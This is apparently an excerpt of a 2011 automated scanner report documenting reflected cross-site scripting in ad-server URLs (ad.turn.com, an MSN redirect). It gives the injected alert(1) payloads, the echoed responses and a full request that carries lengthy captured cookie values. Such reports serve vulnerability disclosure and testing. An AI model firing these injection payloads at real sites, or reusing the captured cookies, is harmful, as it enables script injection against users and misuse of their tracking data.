HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Tue, 22 Mar 2011 21:11:30 GMT Vary: Accept-Encoding Expires: Tue, 22 Mar 2011 21:11:30 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 5266
document.write('<!-- Template Id = 2,594 Template Name = Banner Creative (Flash) - In Page Multiples -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s0.2mdn.ne ...[SNIP]... <a target=\"_blank\" href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/24000000000030802.1?!8e16a'-alert(1)-'93e31e9e62d&&PID=8134962&UIT=G&TargetID=21241065&AN=403718616&PG=NBCRM4&ASID=d146d593dd1041c7b5045855d4810637&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3ad2/17/db/%2a/c%3B233941882%3B0-0%3B0%3B57845090 ...[SNIP]...
The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab508"><script>alert(1)</script>f28986d6202 was submitted in the fpid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /server/pixel.htm?fpid=ab508"><script>alert(1)</script>f28986d6202 HTTP/1.1 Host: ad.turn.com Proxy-Connection: keep-alive Referer: http://www.tmz.com/tips User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: adImpCount=QYdf8pQ322SIyBI2iUoAU4RjEWhnHVjNlGGMhSRuUKth-L3XcPmT4hHXOQgApIlYHYX4_NcWdx3_ane6F4B-14GhJc02ow2AtUwL6WPia2FGaLnf0zlcY_NlRLgfVWu_p2dXRupylG3NYnZS5bXKYP96WiAgIoOXEFUWrzhKF5gCw-urpRf-_9YebSTVOgNrqPihsYENeO8sXA9lvbRdayfMZtqW06LRo26dh_6mdAGJGTELtL4GqGulFNiuT83_JW8PFWxYJ1q2_24dlRk_ah5icQ-UlIA9kPFGJHuyqaq5VL3rxbStQ7qJq0UYbCEIsUtODQcKNwexAxOYVwN1nK5X96dOre3quYO9Z-8ufvZDTyl_SWg8JF85Vro55plfoTgVQZo2IE3aGhkEGjHTkTFiBYl1Y5wme5TkSr2cG_wgfqVSXeBNVe3tcWgG-cKlb6X9zJjlpwSm9YUJH9a4gJTCk-tuxUia_8m_xGP0ng-vamqLuW_YXqfv_SJ_aE8WewT_9aYmy1_kglD2-j2O9xEN2WSuwULQaF3F5bjuxzhmEuJsfxP5f1y2CMVwcPBKjitRrpYhjNWTpkhfFGNz1pMs9g0Q0vhgJiFRvR8WD6y1byxKhk0zupa7mhXtOt59TSvsYEqhZ0OHSuNp70BrBPgFZPUXsLmq7zd2bgatqFEtgpfxqN_T7QEW7hJnuqjPvjaUahkeh2AIOXYNj81E2z9CvciRuIEJCv8yxQ13OGBfB4P3wQx6U2WiVVEP-_Y7EOaV0vIfQZsAGrAD9lknuVDiL3nhapvU0GeEL2HT-L8OVgkB2bwToPK0KdNC16-jTfAO5O3oP_bfifepQZJrTx5icQ-UlIA9kPFGJHuyqarB6alCNElibRNjAQJxQ3wScEcZhGdHz3dGIuUYDCisolLji3VTL1tjXfqm-esg2sewf4n0X2poBn_JF16R7_JpoTgVQZo2IE3aGhkEGjHTkeeFQfumNuZsM8qSWC1YO88e0aAoBCNnU0MrQhAnhIPCOUygdo-nXLnZpGMXrI7zLHABVz72fi9fhT0whWU6oVuvamqLuW_YXqfv_SJ_aE8WghrAn-Vi2vPEwMGFNlZbYxEN2WSuwULQaF3F5bjuxzh7HBG162ww7piqD1aguph5yjHL13DurDt14-jGkVE335Ms9g0Q0vhgJiFRvR8WD6ypA0SKEqBppDDJhLx8qKy9TSvsYEqhZ0OHSuNp70BrBFPAk0ENEI9AkFKrpbmzGs3jQ_DNJLeHeL0m2Znba1buvjaUahkeh2AIOXYNj81E2-JjZ5NuKJfCva75n_nDp_hfB4P3wQx6U2WiVVEP-_Y7anyk5GyGEYfAPBsxHQjGZSlxmSbeaAgfibEHTq6nsWGJGTELtL4GqGulFNiuT83_aWjrAVXVlG7OWMAFleaNmJbd5mJVeqDBeYockQCeOAxxDWE5tfMM7qZbrjn2eVJNHmJxD5SUgD2Q8UYke7KpqkQLRuw_4qwIZ0RgbwcKb_zPkrK-DNPDU2d6IfOlnKh298JoqNIrcIOFh27SKktj64bitenuXABFvYGLN_FjpjihOBVBmjYgTdoaGQQaMdORRSUpCyAfviw4AHYe3ZFe1j_H39CNFZoidFAH_Wwsr2KYkmu9Efz59RTTwRXe0-z-VzZOXR8fEEZYabQJ5OvIrK9qaou5b9hep-_9In9oTxYDFxyCqW2pHLJpyn6DipzREQ3ZZK7BQtBoXcXluO7HOHYn_JVSl2TRope3S5e7WdCOJuOFdBL4jJzlrGgOb4HBkyz2DRDS-GAmIVG9HxYPrCWrE7nz-KJuRo7xf7_4TaxNK-xgSqFnQ4dK42nvQGsE6ABEyeT6GgYO9T7bPr2uOIHF81yXCYglNgztjlxXYaK-NpRqGR6HYAg5dg2PzUTbalw8lqs5Yl_9jBwMs9Tj-V8Hg_fBDHpTZaJVUQ_79jtEExTCNts46MM726dOHk03EHP-IMF08vrzIT3Bb7Svo5bd5mJVeqDBeYockQCeOAxOo3HTnz6UEXwFhetL-lkMHmJxD5SUgD2Q8UYke7KpqjCzTD1GHFKXcyzidRcl9QVgKfB9VVbr4TUFv2p7bOInOewUt5gP_VlI1Ump9cof8bgUMqrglLkQZ2MmUdI_wRihOBVBmjYgTdoaGQQaMdORXsA1mfR2ULXMKrWuUdGM7RySCcjLsN_cxeO5d6Ll7ah1ym-8DGu-cUq_NzKN12epXgVQXjOJNmBQaMF-8bSNxK9qaou5b9hep-_9In9oTxbS-ghZdhmAasmF69aaImA6EQ3ZZK7BQtBoXcXluO7HOMQfuZ4AWvTJ-mwSNztcWshzAqXI_s6r0eNAoWe_e9VLkyz2DRDS-GAmIVG9HxYPrH5VjA_u5FxGvMqUnf9TQBxNK-xgSqFnQ4dK42nvQGsEmI9YI0NszyrnjSHCBrHOF7N0yDfDXTWmk3YZuned4J1zHpbFxYCHf8ECnS552zQGcx6WxcWAh3_BAp0ueds0BnMelsXFgId_wQKdLnnbNAZzHpbFxYCHf8ECnS552zQGcx6WxcWAh3_BAp0ueds0BitnssvNEea-CDLDeF-fwACvWXqvkkof0pdy12XNR71Ur1l6r5JKH9KXctdlzUe9VK9Zeq-SSh_Sl3LXZc1HvVSvWXqvkkof0pdy12XNR71UF-e0dAu4qNmsK2oR2A9RUQVMCl8aLbGecDd_fKt7NywFTApfGi2xnnA3f3yrezcsBUwKXxotsZ5wN398q3s3LAYbc69DjOHmwnxze8q4bqJPPYJ8usI-1hBBRr5uFxgFqfvBa32ACLSnDYXKF1oBeqn7wWt9gAi0pw2FyhdaAXqp-8FrfYAItKcNhcoXWgF6qfvBa32ACLSnDYXKF1oBeqn7wWt9gAi0pw2FyhdaAXryDt3w8cVNrM49PHXxiClIeDq2PHxBb0G93bZOUEV_B3g6tjx8QW9Bvd22TlBFfwd4OrY8fEFvQb3dtk5QRX8HeDq2PHxBb0G93bZOUEV_B34IJwkHmIrESNkEHZ8g1949RfOkpegw2OWd5Gq1X3SAPUXzpKXoMNjlneRqtV90gD1F86Sl6DDY5Z3karVfdIDVzbApqLD2dXriygnNopblFch-eoCuDk8x64052zPt2RXIfnqArg5PMeuNOdsz7dkVyH56gK4OTzHrjTnbM-3ZFch-eoCuDk8x64052zPt2RXIfnqArg5PMeuNOdsz7dkVyH56gK4OTzHrjTnbM-3ZE1zi3eUCecg106GXWo6ZhRNc4t3lAnnINdOhl1qOmYUTXOLd5QJ5yDXToZdajpmFE1zi3eUCecg106GXWo6ZhfPSjW7H5Jkol9-9LsOFip_z0o1ux-SZKJffvS7DhYqf89KNbsfkmSiX370uw4WKn5tSaxPmfiTgjAFYfvIlraaZa6cUR-KH2UMf-39oRIqSmWunFEfih9lDH_t_aESKkiaPGMMoWG79KMJG1_6B63rd33erOmBTEWjk8EHWq8r_3d93qzpgUxFo5PBB1qvK_33J5TXdC2nyuG8O3c9hqKb9UW1UfXUu5_t-s3mYQevC2GfmtRhuVY6zT1uCqUTs7wcwsdHQlOWV3VIdjcK2T9k; fc=k01_H3DQgin2gUWbqEfHVnEgVJOySuH7g303wn-3ThPBhSQ9y8oNWj2jHjllm2qL9SGC6KvWqijMODBe-PTw-vVibMqUG0iKKCPAs_vD_eA0A7iP8ARnu5R4osC1ayLKRfOX1MD02-o6SZ1b0c_HcdJnnDxsS-ubYBpridlzat8; pf=-jffvaaiYNPx61jB-getKKGyms2bzJ5NxJrHe2QHhR8CR6WdDKKuu1EG8_j0F9lfc-tfcqM5Jblcq-6eY583YF0Qxz0OvdT9GuJ7ViZ2YskPgkp2ShdDLnWVrYTrzrIfKDw8kdmwKgOeuifwfRXx2WIgKeliYqxPi2PuzFXXoEo-VuFfahHlgzh_QOs4p8bLZ2yzZnoMqlwp6K58itScC065x0FBCOqeNn5g6wtVvehK3A4I4wtIxPEx2nGfQAG9-vjZrSxhsgJSHWZlu-7Y8lLwHgaXnw1ge6GUoKaB63xdWz9GlTG1fD_ft3p4jB3znlsrDh8fqPATUgh_nFYrQkkmhbbfarzPZdSY8CyibyS7aDCXeV44OfVe9tEHSeUyDESfPnIeWIxfvM0y6r885gJOIocbmkc1C_88Fb9Lp0WkGr2pIJBbUJJxUowTPiGOvjVZlqhHi0TVaBtC-Ytynv5YO9Q0BRsH9i5yvt_pOdNope6-8bcU90Ecut78VcD3VCzgLVZar6mYj-saVcNK8bDe5HX-E1kIk4gMJUB1k1DJNiwErcR6V9-gMPdB133k3Gz1tfgKNZNU9_cW3FNJIvuoVf7YEa8qj1M0riyKsJMP889UjeORWgIr-IDHwwHe4aa1Pvsy5XpmxG2agnko3_pS6GAtAeZmbNLw3yp4AS1KB2Mkrz2y_-jzio6UgOMjGLgCypEar4RaFruO7KXpg7i87Up8F4Q_b2SCEfNkBVcVdzVlCffFCe9fh2T0OxlJf6yjX4dXAVH9x2WubCsF5Yfka217NmVFFyPB1XAcDp9sC5SExI0LW2uUE1ZEj_0G1W2BjDEY10nhggrTZVpS5CkyEIqZbkE5N4BDovA0bs0vLR8diqAiO12sv249SEi9T8YYfDFrAVtFne37-S8b6b8_zrRSm0Pn_iwZp5Njl1Ctpg-Y8MZ4iEuMM8h57h7sA40WqZv-4bpri7csL2Eha5MQmjlPbOzOgtl-6l2XpIhjxu24jEU-jOAKLeLr8pheLZ-qYOggCRZRzxBfMYedtI1f77e2n42rcO7SrM0VQPxYEPmgvy-5sxMT-JXr-g2mztPqvTmnqVETUDUDPzbGpX7rA2wO8p2W1d8jJh9Wgn5fQv_uySNMh5ni7dKMT